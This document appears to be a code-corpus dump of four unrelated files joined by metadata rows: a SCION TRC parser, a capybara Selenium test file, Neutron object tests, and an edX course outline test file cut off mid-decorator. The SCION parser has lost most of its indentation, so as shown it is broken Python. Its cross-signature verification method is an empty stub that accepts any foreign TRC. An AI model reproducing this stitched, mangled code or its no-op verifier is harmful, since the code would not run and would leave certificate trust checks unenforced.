"""
:mod:`trc` --- SCION TRC parser
===============================================
"""
# Stdlib
import base64
import copy
import json
import os
import time
# External
import lz4
# SCION
from lib.crypto.asymcrypto import verify, sign
from lib.crypto.util import CERT_DIR
from lib.errors import SCIONParseError, SCIONVerificationError
from lib.packet.scion_addr import ISD_AS
ISD_STRING = 'ISD'
DESCRIPTION_STRING = 'Description'
VERSION_STRING = 'Version'
CREATION_TIME_STRING = 'CreationTime'
EXPIRATION_TIME_STRING = 'ExpirationTime'
CORE_ASES_STRING = 'CoreASes'
ROOT_CAS_STRING = 'RootCAs'
CERT_LOGS_STRING = 'CertLogs'
THRESHOLD_EEPKI_STRING = 'ThresholdEEPKI'
RAINS_STRING = 'RAINS'
QUORUM_TRC_STRING = 'QuorumTRC'
QUORUM_CAS_STRING = 'QuorumCAs'
GRACE_PERIOD_STRING = 'GracePeriod'
QUARANTINE_STRING = 'Quarantine'
SIGNATURES_STRING = 'Signatures'
ARPKI_KEY_STRING = 'ARPKIKey'
ARPKI_SRV_STRING = 'ARPKISrv'
CERTIFICATE_STRING = 'Certificate'
OFFLINE_KEY_ALG_STRING = 'OfflineKeyAlg'
OFFLINE_KEY_STRING = 'OfflineKey'
ONLINE_KEY_ALG_STRING = 'OnlineKeyAlg'
ONLINE_KEY_STRING = 'OnlineKey'
ROOT_RAINS_KEY_STRING = 'RootRAINSKey'
TRC_SRV_STRING = 'TRCSrv'
def get_trc_file_path(conf_dir, isd, version): # pragma: no cover
"""
Return the TRC file path for a given ISD.
"""
return os.path.join(conf_dir, CERT_DIR, 'ISD%s-V%s.trc' % (isd, version))
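# Example (illustrative, assuming CERT_DIR == 'certs' and a hypothetical
# conf_dir):
#
#   get_trc_file_path('gen/ISD1/AS11/endhost', 1, 0)
#   # -> 'gen/ISD1/AS11/endhost/certs/ISD1-V0.trc'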
class TRC(object):
"""
The TRC class parses the TRC file of an ISD and stores such
information for further use.
:ivar int isd: the ISD identifier.
:ivar str description: is a human readable description of an ISD.
:ivar int version: the TRC file version.
:ivar int create_time: the TRC file creation timestamp.
:ivar int exp_time: the TRC expiration timestamp.
:ivar dict core_ases: the set of core ASes and their certificates.
:ivar dict root_cas: the set of root CAs and their certificates.
:ivar dict cert_logs: is a dictionary of end entity certificate log servers of
form {name: {"isd_as IP": pub_key}}
:ivar int threshold_eepki: is a threshold number (nonnegative integer) of
CAs that have to sign a domain’s policy
:ivar dict rains: the RAINS section.
:ivar int quorum_trc: number of core ASes necessary to sign a new TRC.
:ivar int quorum_cas: number of CAs necessary to change CA entries
:ivar int grace_period: defines for how long this TRC is valid when a new
TRC is available
    :ivar bool quarantine: flag defining whether TRC is valid (quarantine=false)
        or an early announcement (quarantine=true)
:ivar dict signatures: signatures generated by a quorum of trust roots.
"""
FIELDS_MAP = {
ISD_STRING: ("isd", int),
DESCRIPTION_STRING: ("description", str),
VERSION_STRING: ("version", int),
CREATION_TIME_STRING: ("create_time", int),
EXPIRATION_TIME_STRING: ("exp_time", int),
CORE_ASES_STRING: ("core_ases", dict),
ROOT_CAS_STRING: ("root_cas", dict),
CERT_LOGS_STRING: ("cert_logs", dict),
THRESHOLD_EEPKI_STRING: ("threshold_eepki", int),
RAINS_STRING: ("rains", dict),
QUORUM_TRC_STRING: ("quorum_trc", int),
QUORUM_CAS_STRING: ("quorum_cas", int),
QUARANTINE_STRING: ("quarantine", bool),
SIGNATURES_STRING: ("signatures", dict),
GRACE_PERIOD_STRING: ("grace_period", int),
}
# list of fields in a dict of dicts which have to be encoded/decoded from base64
MULTI_DICT_DECODE_FIELDS = {
CORE_ASES_STRING: [ONLINE_KEY_STRING, OFFLINE_KEY_STRING],
ROOT_CAS_STRING: [CERTIFICATE_STRING, ONLINE_KEY_STRING, ARPKI_KEY_STRING],
}
# list of fields in a dict which have to be encoded/decoded
SIMPLE_DICT_DECODE_FIELDS = {
RAINS_STRING: [ROOT_RAINS_KEY_STRING, ONLINE_KEY_STRING],
SIGNATURES_STRING: [],
}
def __init__(self, trc_dict):
"""
:param dict trc_dict: TRC as dict.
"""
for k, (name, type_) in self.FIELDS_MAP.items():
val = trc_dict[k]
if type_ in (int,):
val = int(val)
elif type_ in (dict, ):
val = copy.deepcopy(val)
setattr(self, name, val)
for attr, decode_list in self.MULTI_DICT_DECODE_FIELDS.items():
field = getattr(self, self.FIELDS_MAP[attr][0])
for entry in field.values():
for key in decode_list:
entry[key] = base64.b64decode(entry[key].encode('utf-8'))
for attr, decode_list in self.SIMPLE_DICT_DECODE_FIELDS.items():
entry = getattr(self, self.FIELDS_MAP[attr][0])
if not entry:
continue
for key in decode_list or entry:
entry[key] = base64.b64decode(entry[key].encode('utf-8'))
for subject, entry in trc_dict[CERT_LOGS_STRING].items():
try:
addr, pub_key = next(iter(entry.items()))
self.cert_logs[subject][addr] = base64.b64decode(pub_key.encode('utf-8'))
except StopIteration:
raise SCIONParseError("Invalid CertLogs entry for %s: %s", subject, entry)
def get_isd_ver(self):
return self.isd, self.version
def get_core_ases(self):
res = []
for key in self.core_ases:
res.append(ISD_AS(key))
return res
def dict(self, with_signatures):
"""
Return the TRC information.
:param bool with_signatures:
If True, include signatures in the return value.
:returns: the TRC information.
:rtype: dict
"""
trc_dict = {}
for k, (name, _) in self.FIELDS_MAP.items():
trc_dict[k] = getattr(self, name)
if not with_signatures:
del trc_dict[SIGNATURES_STRING]
return trc_dict
@classmethod
def from_raw(cls, trc_raw, lz4_=False):
if lz4_:
trc_raw = lz4.loads(trc_raw).decode("utf-8")
trc = json.loads(trc_raw)
return TRC(trc)
@classmethod
def from_values(cls, isd, description, version, core_ases, root_cas,
cert_logs, threshold_eepki, rains, quorum_trc,
quorum_cas, grace_period, quarantine, signatures, validity_period):
"""
Generate a TRC instance.
"""
now = int(time.time())
trc_dict = {
ISD_STRING: isd,
DESCRIPTION_STRING: description,
VERSION_STRING: version,
CREATION_TIME_STRING: now,
EXPIRATION_TIME_STRING: now + validity_period,
CORE_ASES_STRING: core_ases,
ROOT_CAS_STRING: root_cas,
CERT_LOGS_STRING: cert_logs,
THRESHOLD_EEPKI_STRING: threshold_eepki,
RAINS_STRING: rains,
QUORUM_TRC_STRING: quorum_trc,
QUORUM_CAS_STRING: quorum_cas,
GRACE_PERIOD_STRING: grace_period,
QUARANTINE_STRING: quarantine,
SIGNATURES_STRING: signatures,
}
trc = TRC(trc_dict)
return trc
def sign(self, isd_as, sig_priv_key):
"""
Sign TRC and add computed signature to the TRC.
:param ISD_AS isd_as: the ISD-AS of signer.
:param SigningKey sig_priv_key: the signing key of signer.
"""
data = self._sig_input()
self.signatures[str(isd_as)] = sign(data, sig_priv_key)
def _sig_input(self):
d = self.dict(False)
for k in d:
if self.FIELDS_MAP[k][1] == dict:
d[k] = self._encode_dict(d[k])
j = json.dumps(d, sort_keys=True, separators=(',', ':'))
return j.encode('utf-8')
def _encode_dict(self, dict_):
encoded_dict = {}
for key, val in dict_.items():
if type(val) is dict:
val = self._encode_sub_dict(val)
elif type(val) is bytes:
val = base64.b64encode(val).decode('utf-8')
encoded_dict[key] = val
return encoded_dict
def _encode_sub_dict(self, dict_):
encoded_dict = {}
for key, val in dict_.items():
if type(val) is bytes:
val = base64.b64encode(val).decode('utf-8')
encoded_dict[key] = val
return encoded_dict
def to_json(self, with_signatures=True):
"""
Convert the instance to json format.
"""
trc_dict = copy.deepcopy(self.dict(with_signatures))
for field, decode_list in self.MULTI_DICT_DECODE_FIELDS.items():
for entry in trc_dict[field].values():
for key in decode_list:
entry[key] = base64.b64encode(entry[key]).decode('utf-8')
for field, decode_list in self.SIMPLE_DICT_DECODE_FIELDS.items():
entry = trc_dict.get(field, None)
if not entry or (field == SIGNATURES_STRING and not with_signatures):
continue
# Every value is decoded, if decode_list is empty
for key in decode_list or entry:
entry[key] = base64.b64encode(entry[key]).decode('utf-8')
cert_logs = {}
for subject, entry in trc_dict[CERT_LOGS_STRING].items():
try:
addr = next(iter(entry.keys()))
entry[addr] = base64.b64encode(entry[addr]).decode('utf-8')
cert_logs[subject] = entry
except StopIteration:
pass
trc_dict[CERT_LOGS_STRING] = cert_logs
trc_str = json.dumps(trc_dict, sort_keys=True, indent=4)
return trc_str
def pack(self, lz4_=False):
ret = self.to_json().encode('utf-8')
if lz4_:
return lz4.dumps(ret)
return ret
def __str__(self):
return self.to_json()
def __eq__(self, other): # pragma: no cover
return str(self) == str(other)
def check_active(self, max_trc=None):
"""
Check if trusted TRC is active and can be used for certificate chain verification.
:param TRC max_trc: newest available TRC for same ISD. (If none, self is newest TRC)
:raises: SCIONVerificationError
"""
if self.quarantine:
raise SCIONVerificationError("Early announcement")
now = int(time.time())
if not (self.create_time <= now <= self.exp_time):
raise SCIONVerificationError("Current time outside of validity period. "
"Now %s Creation %s Expiration %s" %
(now, self.create_time, self.exp_time))
if not max_trc or self.version == max_trc.version:
return
if self.version + 1 != max_trc.version:
raise SCIONVerificationError("Inactive TRC version: %s. Expected %s or %s" % (
self.version, max_trc.version, max_trc.version - 1))
if now > max_trc.create_time + max_trc.grace_period:
raise SCIONVerificationError("TRC grace period has passed. Now %s Expiration %s" % (
now, max_trc.create_time + max_trc.grace_period))
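    # Worked example (illustrative): if the newest available TRC has version 5,
    # create_time T and grace_period G, check_active() still accepts a trusted
    # TRC of version 4 for any `now` <= T + G (provided `now` also lies inside
    # that TRC's own create/exp window); the version-5 TRC itself is accepted
    # until its exp_time.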
def verify(self, trusted_trc):
"""
Verify TRC based on a trusted TRC.
:param TRC trusted_trc: a verified TRC, used as a trust anchor.
:raises: SCIONVerificationError
"""
if self.version == 0:
raise SCIONVerificationError("Invalid TRC version 0")
if self.isd == trusted_trc.isd:
self.verify_update(trusted_trc)
else:
self.verify_xsig(trusted_trc)
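    # Minimal usage sketch (illustrative; `raw_bytes` and `trusted_trc` are
    # assumed to come from the caller): verifying a newly received TRC of the
    # same ISD against the currently trusted one might look roughly like
    #
    #   new_trc = TRC.from_raw(raw_bytes)
    #   trusted_trc.check_active(max_trc=new_trc)
    #   new_trc.verify(trusted_trc)   # same ISD, so this calls verify_update()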
def verify_update(self, old_trc):
"""
Verify TRC update.
Unsuccessful verification raises an error.
:param TRC old_trc: a verified TRC, used as a trust anchor.
:raises: SCIONVerificationError
"""
if old_trc.isd != self.isd:
raise SCIONVerificationError("Invalid TRC ISD %s. Expected %s" % (
self.isd, old_trc.isd))
if old_trc.version + 1 != self.version:
raise SCIONVerificationError("Invalid TRC version %s. Expected %s" % (
                self.version, old_trc.version + 1))
if self.create_time < old_trc.create_time + old_trc.grace_period:
raise SCIONVerificationError("Invalid timestamp %s. Expected > %s " % (
self.create_time, old_trc.create_time + old_trc.grace_period))
if self.quarantine or old_trc.quarantine:
raise SCIONVerificationError("Early announcement")
self._verify_signatures(old_trc)
def verify_xsig(self, neigh_trc):
"""
Verify cross signatures.
:param TRC neigh_trc: neighbour TRC, used as a trust anchor.
:raises: SCIONVerificationError
"""
pass
def _verify_signatures(self, old_trc):
"""
Perform signature verification for core signatures as defined
in old TRC. Raises an error if verification is unsuccessful.
:param: TRC old_trc: the previous TRC which has already been verified.
:raises: SCIONVerificationError
"""
# Only look at signatures which are from core ASes as defined in old TRC
val_count = 0
# Count number of verifiable signatures
for signer in old_trc.core_ases.keys():
public_key = old_trc.core_ases[signer][ONLINE_KEY_STRING]
try:
verify(self._sig_input(), self.signatures[signer], public_key)
val_count += 1
except (SCIONVerificationError, KeyError):
continue
# Check if enough valid signatures
if val_count < old_trc.quorum_trc:
raise SCIONVerificationError("Not enough valid signatures %s. Expected %s" % (
val_count, old_trc.quorum_trc))
| apache-2.0 | -1,832,684,012,152,019,700 | 36.871053 | 96 | 0.598638 | false |
elliterate/capybara.py | tests/_test_selenium_marionette.py | 1 | 2359 | import os
import pytest
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.firefox.options import Options
import capybara
from capybara.selenium.driver import Driver
from capybara.session import Session
from capybara.tests.app import app
from capybara.tests.suite import DriverSuite
from tests.selenium_session_test_case import SeleniumSessionTestCase
capabilities = DesiredCapabilities.FIREFOX.copy()
capabilities["marionette"] = True
firefox_options = Options()
if os.environ.get("HEADLESS"):
firefox_options.add_argument("--headless")
# Allow the driver to attach files.
firefox_options.set_preference("dom.file.createInChild", True)
@capybara.register_driver("selenium_marionette")
def init_selenium_marionette_driver(app):
return Driver(
app,
browser="firefox",
desired_capabilities=capabilities,
firefox_options=firefox_options)
@capybara.register_driver("selenium_marionette_clear_storage")
def init_selenium_marionette_clear_storage_driver(app):
return Driver(
app,
browser="firefox",
desired_capabilities=capabilities,
clear_local_storage=True,
clear_session_storage=True,
firefox_options=firefox_options)
SeleniumMarionetteDriverSuite = DriverSuite("selenium_marionette")
class TestSeleniumSession(SeleniumSessionTestCase):
@pytest.fixture(scope="module")
def session(self):
return Session("selenium_marionette", app)
class TestSeleniumMarionette:
def test_reset_does_not_clear_either_storage_by_default(self):
session = Session("selenium_marionette", app)
session.visit("/with_js")
session.find("css", "#set-storage").click()
session.reset()
session.visit("/with_js")
assert session.evaluate_script("window.localStorage.length") > 0
assert session.evaluate_script("window.sessionStorage.length") > 0
def test_reset_clears_storage_when_set(self):
session = Session("selenium_marionette_clear_storage", app)
session.visit("/with_js")
session.find("css", "#set-storage").click()
session.reset()
session.visit("/with_js")
assert session.evaluate_script("window.localStorage.length") == 0
assert session.evaluate_script("window.sessionStorage.length") == 0
| mit | 1,059,170,167,414,687,000 | 32.225352 | 78 | 0.72234 | false |
yanheven/neutron | neutron/tests/unit/objects/test_base.py | 6 | 13419 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import mock
from oslo_db import exception as obj_exc
from oslo_versionedobjects import base as obj_base
from oslo_versionedobjects import fields as obj_fields
from neutron.common import exceptions as n_exc
from neutron.common import utils as common_utils
from neutron import context
from neutron.db import api as db_api
from neutron.objects import base
from neutron.tests import base as test_base
from neutron.tests import tools
SQLALCHEMY_COMMIT = 'sqlalchemy.engine.Connection._commit_impl'
OBJECTS_BASE_OBJ_FROM_PRIMITIVE = ('oslo_versionedobjects.base.'
'VersionedObject.obj_from_primitive')
class FakeModel(object):
def __init__(self, *args, **kwargs):
pass
@obj_base.VersionedObjectRegistry.register
class FakeNeutronObject(base.NeutronDbObject):
db_model = FakeModel
fields = {
'id': obj_fields.UUIDField(),
'field1': obj_fields.StringField(),
'field2': obj_fields.StringField()
}
fields_no_update = ['id']
synthetic_fields = ['field2']
FIELD_TYPE_VALUE_GENERATOR_MAP = {
obj_fields.BooleanField: tools.get_random_boolean,
obj_fields.IntegerField: tools.get_random_integer,
obj_fields.StringField: tools.get_random_string,
obj_fields.UUIDField: tools.get_random_string,
obj_fields.ListOfObjectsField: lambda: []
}
def get_obj_db_fields(obj):
return {field: getattr(obj, field) for field in obj.fields
if field not in obj.synthetic_fields}
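# For example (illustrative): for a FakeNeutronObject with id='uuid-1' and
# field1='foo', the synthetic 'field2' is skipped and this helper returns
# {'id': 'uuid-1', 'field1': 'foo'}.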
class _BaseObjectTestCase(object):
_test_class = FakeNeutronObject
def setUp(self):
super(_BaseObjectTestCase, self).setUp()
self.context = context.get_admin_context()
self.db_objs = list(self.get_random_fields() for _ in range(3))
self.db_obj = self.db_objs[0]
valid_field = [f for f in self._test_class.fields
if f not in self._test_class.synthetic_fields][0]
self.valid_field_filter = {valid_field: self.db_obj[valid_field]}
@classmethod
def get_random_fields(cls, obj_cls=None):
obj_cls = obj_cls or cls._test_class
fields = {}
for field, field_obj in obj_cls.fields.items():
if field not in obj_cls.synthetic_fields:
generator = FIELD_TYPE_VALUE_GENERATOR_MAP[type(field_obj)]
fields[field] = generator()
return fields
def get_updatable_fields(self, fields):
return base.get_updatable_fields(self._test_class, fields)
@classmethod
def _is_test_class(cls, obj):
return isinstance(obj, cls._test_class)
class BaseObjectIfaceTestCase(_BaseObjectTestCase, test_base.BaseTestCase):
def test_get_by_id(self):
with mock.patch.object(db_api, 'get_object',
return_value=self.db_obj) as get_object_mock:
obj = self._test_class.get_by_id(self.context, id='fake_id')
self.assertTrue(self._is_test_class(obj))
self.assertEqual(self.db_obj, get_obj_db_fields(obj))
get_object_mock.assert_called_once_with(
self.context, self._test_class.db_model, id='fake_id')
def test_get_by_id_missing_object(self):
with mock.patch.object(db_api, 'get_object', return_value=None):
obj = self._test_class.get_by_id(self.context, id='fake_id')
self.assertIsNone(obj)
def test_get_objects(self):
with mock.patch.object(db_api, 'get_objects',
return_value=self.db_objs) as get_objects_mock:
objs = self._test_class.get_objects(self.context)
self._validate_objects(self.db_objs, objs)
get_objects_mock.assert_called_once_with(
self.context, self._test_class.db_model)
def test_get_objects_valid_fields(self):
with mock.patch.object(
db_api, 'get_objects',
return_value=[self.db_obj]) as get_objects_mock:
objs = self._test_class.get_objects(self.context,
**self.valid_field_filter)
self._validate_objects([self.db_obj], objs)
get_objects_mock.assert_called_with(
self.context, self._test_class.db_model,
**self.valid_field_filter)
def test_get_objects_mixed_fields(self):
synthetic_fields = self._test_class.synthetic_fields
if not synthetic_fields:
self.skipTest('No synthetic fields found in test class %r' %
self._test_class)
filters = copy.copy(self.valid_field_filter)
filters[synthetic_fields[0]] = 'xxx'
with mock.patch.object(db_api, 'get_objects',
return_value=self.db_objs):
self.assertRaises(base.exceptions.InvalidInput,
self._test_class.get_objects, self.context,
**filters)
def test_get_objects_synthetic_fields(self):
synthetic_fields = self._test_class.synthetic_fields
if not synthetic_fields:
self.skipTest('No synthetic fields found in test class %r' %
self._test_class)
with mock.patch.object(db_api, 'get_objects',
return_value=self.db_objs):
self.assertRaises(base.exceptions.InvalidInput,
self._test_class.get_objects, self.context,
**{synthetic_fields[0]: 'xxx'})
def test_get_objects_invalid_fields(self):
with mock.patch.object(db_api, 'get_objects',
return_value=self.db_objs):
self.assertRaises(base.exceptions.InvalidInput,
self._test_class.get_objects, self.context,
fake_field='xxx')
def _validate_objects(self, expected, observed):
self.assertTrue(all(self._is_test_class(obj) for obj in observed))
self.assertEqual(
sorted(expected,
key=common_utils.safe_sort_key),
sorted([get_obj_db_fields(obj) for obj in observed],
key=common_utils.safe_sort_key))
def _check_equal(self, obj, db_obj):
self.assertEqual(
sorted(db_obj),
sorted(get_obj_db_fields(obj)))
def test_create(self):
with mock.patch.object(db_api, 'create_object',
return_value=self.db_obj) as create_mock:
obj = self._test_class(self.context, **self.db_obj)
self._check_equal(obj, self.db_obj)
obj.create()
self._check_equal(obj, self.db_obj)
create_mock.assert_called_once_with(
self.context, self._test_class.db_model, self.db_obj)
def test_create_updates_from_db_object(self):
with mock.patch.object(db_api, 'create_object',
return_value=self.db_obj):
obj = self._test_class(self.context, **self.db_objs[1])
self._check_equal(obj, self.db_objs[1])
obj.create()
self._check_equal(obj, self.db_obj)
def test_create_duplicates(self):
with mock.patch.object(db_api, 'create_object',
side_effect=obj_exc.DBDuplicateEntry):
obj = self._test_class(self.context, **self.db_obj)
self.assertRaises(base.NeutronDbObjectDuplicateEntry, obj.create)
@mock.patch.object(db_api, 'update_object')
def test_update_no_changes(self, update_mock):
with mock.patch.object(base.NeutronDbObject,
'_get_changed_persistent_fields',
return_value={}):
obj = self._test_class(self.context)
obj.update()
self.assertFalse(update_mock.called)
@mock.patch.object(db_api, 'update_object')
def test_update_changes(self, update_mock):
fields_to_update = self.get_updatable_fields(self.db_obj)
with mock.patch.object(base.NeutronDbObject,
'_get_changed_persistent_fields',
return_value=fields_to_update):
obj = self._test_class(self.context, **self.db_obj)
obj.update()
update_mock.assert_called_once_with(
self.context, self._test_class.db_model,
self.db_obj['id'], fields_to_update)
@mock.patch.object(base.NeutronDbObject,
'_get_changed_persistent_fields',
return_value={'a': 'a', 'b': 'b', 'c': 'c'})
def test_update_changes_forbidden(self, *mocks):
with mock.patch.object(
self._test_class,
'fields_no_update',
new_callable=mock.PropertyMock(return_value=['a', 'c']),
create=True):
obj = self._test_class(self.context, **self.db_obj)
self.assertRaises(base.NeutronObjectUpdateForbidden, obj.update)
def test_update_updates_from_db_object(self):
with mock.patch.object(db_api, 'update_object',
return_value=self.db_obj):
obj = self._test_class(self.context, **self.db_objs[1])
fields_to_update = self.get_updatable_fields(self.db_objs[1])
with mock.patch.object(base.NeutronDbObject,
'_get_changed_persistent_fields',
return_value=fields_to_update):
obj.update()
self._check_equal(obj, self.db_obj)
@mock.patch.object(db_api, 'delete_object')
def test_delete(self, delete_mock):
obj = self._test_class(self.context, **self.db_obj)
self._check_equal(obj, self.db_obj)
obj.delete()
self._check_equal(obj, self.db_obj)
delete_mock.assert_called_once_with(
self.context, self._test_class.db_model, self.db_obj['id'])
@mock.patch(OBJECTS_BASE_OBJ_FROM_PRIMITIVE)
def test_clean_obj_from_primitive(self, get_prim_m):
expected_obj = get_prim_m.return_value
observed_obj = self._test_class.clean_obj_from_primitive('foo', 'bar')
self.assertIs(expected_obj, observed_obj)
self.assertTrue(observed_obj.obj_reset_changes.called)
class BaseDbObjectTestCase(_BaseObjectTestCase):
def test_get_by_id_create_update_delete(self):
obj = self._test_class(self.context, **self.db_obj)
obj.create()
new = self._test_class.get_by_id(self.context, id=obj.id)
self.assertEqual(obj, new)
obj = new
for key, val in self.get_updatable_fields(self.db_objs[1]).items():
setattr(obj, key, val)
obj.update()
new = self._test_class.get_by_id(self.context, id=obj.id)
self.assertEqual(obj, new)
obj = new
new.delete()
new = self._test_class.get_by_id(self.context, id=obj.id)
self.assertIsNone(new)
def test_update_non_existent_object_raises_not_found(self):
obj = self._test_class(self.context, **self.db_obj)
obj.obj_reset_changes()
for key, val in self.get_updatable_fields(self.db_obj).items():
setattr(obj, key, val)
self.assertRaises(n_exc.ObjectNotFound, obj.update)
def test_delete_non_existent_object_raises_not_found(self):
obj = self._test_class(self.context, **self.db_obj)
self.assertRaises(n_exc.ObjectNotFound, obj.delete)
@mock.patch(SQLALCHEMY_COMMIT)
def test_create_single_transaction(self, mock_commit):
obj = self._test_class(self.context, **self.db_obj)
obj.create()
self.assertEqual(1, mock_commit.call_count)
def test_update_single_transaction(self):
obj = self._test_class(self.context, **self.db_obj)
obj.create()
for key, val in self.get_updatable_fields(self.db_obj).items():
setattr(obj, key, val)
with mock.patch(SQLALCHEMY_COMMIT) as mock_commit:
obj.update()
self.assertEqual(1, mock_commit.call_count)
def test_delete_single_transaction(self):
obj = self._test_class(self.context, **self.db_obj)
obj.create()
with mock.patch(SQLALCHEMY_COMMIT) as mock_commit:
obj.delete()
self.assertEqual(1, mock_commit.call_count)
@mock.patch(SQLALCHEMY_COMMIT)
def test_get_objects_single_transaction(self, mock_commit):
self._test_class.get_objects(self.context)
self.assertEqual(1, mock_commit.call_count)
@mock.patch(SQLALCHEMY_COMMIT)
def test_get_by_id_single_transaction(self, mock_commit):
obj = self._test_class(self.context, **self.db_obj)
obj.create()
obj = self._test_class.get_by_id(self.context, obj.id)
self.assertEqual(2, mock_commit.call_count)
| apache-2.0 | -6,890,074,864,445,030,000 | 38.122449 | 78 | 0.605112 | false |
EDUlib/edx-platform | openedx/features/course_experience/tests/views/test_course_outline.py | 1 | 34329 | """
Tests for the Course Outline view and supporting views.
"""
import datetime
import re
import ddt
import six
from completion.waffle import ENABLE_COMPLETION_TRACKING_SWITCH
from completion.models import BlockCompletion
from completion.test_utils import CompletionWaffleTestMixin
from django.contrib.sites.models import Site
from django.test import RequestFactory, override_settings
from django.urls import reverse
from django.utils import timezone
from edx_toggles.toggles.testutils import override_waffle_switch
from milestones.tests.utils import MilestonesTestCaseMixin
from mock import Mock, patch
from opaque_keys.edx.keys import CourseKey, UsageKey
from pyquery import PyQuery as pq
from pytz import UTC
from six import text_type
from waffle.models import Switch
from common.djangoapps.course_modes.models import CourseMode
from common.djangoapps.course_modes.tests.factories import CourseModeFactory
from lms.djangoapps.course_api.blocks.transformers.milestones import MilestonesAndSpecialExamsTransformer
from lms.djangoapps.gating import api as lms_gating_api
from lms.djangoapps.courseware.tests.factories import StaffFactory
from lms.djangoapps.courseware.tests.helpers import MasqueradeMixin
from lms.djangoapps.experiments.testutils import override_experiment_waffle_flag
from lms.urls import RESET_COURSE_DEADLINES_NAME
from openedx.core.djangoapps.course_date_signals.models import SelfPacedRelativeDatesConfig
from openedx.core.djangoapps.schedules.models import Schedule
from openedx.core.djangoapps.schedules.tests.factories import ScheduleFactory # pylint: disable=unused-import
from openedx.core.lib.gating import api as gating_api
from openedx.features.content_type_gating.models import ContentTypeGatingConfig
from openedx.features.course_experience import RELATIVE_DATES_FLAG
from openedx.features.course_experience.views.course_outline import (
DEFAULT_COMPLETION_TRACKING_START,
CourseOutlineFragmentView
)
from common.djangoapps.student.models import CourseEnrollment
from common.djangoapps.student.tests.factories import UserFactory
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.tests.django_utils import SharedModuleStoreTestCase
from xmodule.modulestore.tests.factories import CourseFactory, ItemFactory
from ...utils import get_course_outline_block_tree
from .test_course_home import course_home_url
TEST_PASSWORD = 'test'
GATING_NAMESPACE_QUALIFIER = '.gating'
@ddt.ddt
class TestCourseOutlinePage(SharedModuleStoreTestCase, MasqueradeMixin):
"""
Test the course outline view.
"""
ENABLED_SIGNALS = ['course_published']
@classmethod
def setUpClass(cls): # lint-amnesty, pylint: disable=super-method-not-called
"""
Set up an array of various courses to be tested.
"""
SelfPacedRelativeDatesConfig.objects.create(enabled=True)
# setUpClassAndTestData() already calls setUpClass on SharedModuleStoreTestCase
# pylint: disable=super-method-not-called
with super(TestCourseOutlinePage, cls).setUpClassAndTestData():
cls.courses = []
course = CourseFactory.create(self_paced=True)
with cls.store.bulk_operations(course.id):
chapter = ItemFactory.create(category='chapter', parent_location=course.location)
sequential = ItemFactory.create(category='sequential', parent_location=chapter.location, graded=True, format="Homework") # lint-amnesty, pylint: disable=line-too-long
vertical = ItemFactory.create(category='vertical', parent_location=sequential.location)
problem = ItemFactory.create(category='problem', parent_location=vertical.location)
course.children = [chapter]
chapter.children = [sequential]
sequential.children = [vertical]
vertical.children = [problem]
cls.courses.append(course)
course = CourseFactory.create()
with cls.store.bulk_operations(course.id):
chapter = ItemFactory.create(category='chapter', parent_location=course.location)
sequential = ItemFactory.create(category='sequential', parent_location=chapter.location)
sequential2 = ItemFactory.create(category='sequential', parent_location=chapter.location)
vertical = ItemFactory.create(
category='vertical',
parent_location=sequential.location,
display_name="Vertical 1"
)
vertical2 = ItemFactory.create(
category='vertical',
parent_location=sequential2.location,
display_name="Vertical 2"
)
course.children = [chapter]
chapter.children = [sequential, sequential2]
sequential.children = [vertical]
sequential2.children = [vertical2]
cls.courses.append(course)
course = CourseFactory.create()
with cls.store.bulk_operations(course.id):
chapter = ItemFactory.create(category='chapter', parent_location=course.location)
sequential = ItemFactory.create(
category='sequential',
parent_location=chapter.location,
due=datetime.datetime.now(),
graded=True,
format='Homework',
)
vertical = ItemFactory.create(category='vertical', parent_location=sequential.location)
course.children = [chapter]
chapter.children = [sequential]
sequential.children = [vertical]
cls.courses.append(course)
@classmethod
def setUpTestData(cls): # lint-amnesty, pylint: disable=super-method-not-called
"""Set up and enroll our fake user in the course."""
cls.user = UserFactory(password=TEST_PASSWORD)
for course in cls.courses:
CourseEnrollment.enroll(cls.user, course.id)
Schedule.objects.update(start_date=timezone.now() - datetime.timedelta(days=1))
def setUp(self):
"""
Set up for the tests.
"""
super(TestCourseOutlinePage, self).setUp() # lint-amnesty, pylint: disable=super-with-arguments
self.client.login(username=self.user.username, password=TEST_PASSWORD)
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
def test_outline_details(self):
for course in self.courses:
url = course_home_url(course)
request_factory = RequestFactory()
request = request_factory.get(url)
request.user = self.user
course_block_tree = get_course_outline_block_tree(
request, str(course.id), self.user
)
response = self.client.get(url)
assert course.children
for chapter in course_block_tree['children']:
self.assertContains(response, chapter['display_name'])
assert chapter['children']
for sequential in chapter['children']:
self.assertContains(response, sequential['display_name'])
if sequential['graded']:
print(sequential)
self.assertContains(response, sequential['due'].strftime(u'%Y-%m-%d %H:%M:%S'))
self.assertContains(response, sequential['format'])
assert sequential['children']
def test_num_graded_problems(self):
course = CourseFactory.create()
with self.store.bulk_operations(course.id):
chapter = ItemFactory.create(category='chapter', parent_location=course.location)
sequential = ItemFactory.create(category='sequential', parent_location=chapter.location)
problem = ItemFactory.create(category='problem', parent_location=sequential.location)
sequential2 = ItemFactory.create(category='sequential', parent_location=chapter.location)
problem2 = ItemFactory.create(category='problem', graded=True, has_score=True,
parent_location=sequential2.location)
sequential3 = ItemFactory.create(category='sequential', parent_location=chapter.location)
problem3_1 = ItemFactory.create(category='problem', graded=True, has_score=True,
parent_location=sequential3.location)
problem3_2 = ItemFactory.create(category='problem', graded=True, has_score=True,
parent_location=sequential3.location)
course.children = [chapter]
chapter.children = [sequential, sequential2, sequential3]
sequential.children = [problem]
sequential2.children = [problem2]
sequential3.children = [problem3_1, problem3_2]
CourseEnrollment.enroll(self.user, course.id)
url = course_home_url(course)
response = self.client.get(url)
content = response.content.decode('utf8')
self.assertRegex(content, sequential.display_name + r'\s*</h4>')
self.assertRegex(content, sequential2.display_name + r'\s*\(1 Question\)\s*</h4>')
self.assertRegex(content, sequential3.display_name + r'\s*\(2 Questions\)\s*</h4>')
@override_experiment_waffle_flag(RELATIVE_DATES_FLAG, active=True)
@ddt.data(
([CourseMode.AUDIT, CourseMode.VERIFIED], CourseMode.AUDIT, False, True),
